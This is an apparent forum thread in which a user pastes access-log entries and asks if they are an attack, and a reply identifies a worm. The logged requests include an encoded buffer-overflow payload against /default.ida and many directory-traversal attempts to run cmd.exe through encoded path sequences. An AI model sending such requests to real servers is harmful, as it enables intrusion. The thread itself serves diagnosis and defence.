Helpful Information
Home
Categories
Contact us
Category: Antivirus Protection
Virus, Hacker or what?
I keep getting this showing up in my access log. I am guessing it is some kind of script probing my machine for vulnerabilities?
Anyone know for sure?
68.83.51.194 - - [10/Sep/2003:11:11:10 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3 %u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 1072 "-" "-"
68.80.96.56 - - [10/Sep/2003:13:01:15 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1057 "-" "-"
68.80.96.56 - - [10/Sep/2003:13:01:16 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 1057 "-" "-"
68.80.96.56 - - [10/Sep/2003:13:01:18 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1057 "-" "-"
68.80.96.56 - - [10/Sep/2003:13:01:20 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1057 "-" "-"
68.80.96.56 - - [10/Sep/2003:13:01:22 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1057 "-" "-"
68.80.96.56 - - [10/Sep/2003:13:01:24 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 1057 "-" "-"
68.80.96.56 - - [10/Sep/2003:13:01:26 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
404 1057 "-" "-"
68.80.96.56 - - [10/Sep/2003:13:01:28 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c..
/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1057 "-" "-"
68.80.96.56 - - [10/Sep/2003:13:01:30 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1057 "-" "-"
68.80.96.56 - - [10/Sep/2003:13:01:32 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1057 "-" "-"
68.80.96.56 - - [10/Sep/2003:13:01:34 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1057 "-" "-"
68.80.96.56 - - [10/Sep/2003:13:01:36 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1057 "-" "-"
68.80.96.56 - - [10/Sep/2003:13:01:38 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 990 "-" "-"
68.80.96.56 - - [10/Sep/2003:13:01:39 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 990 "-" "-"
68.80.96.56 - - [10/Sep/2003:13:01:41 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1057 "-" "-"
68.80.96.56 - - [10/Sep/2003:13:01:43 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1057 "-" "-"
yes, it is indeed a worm, but i believe apache is safe & so are patched IIS
privacy (GDPR)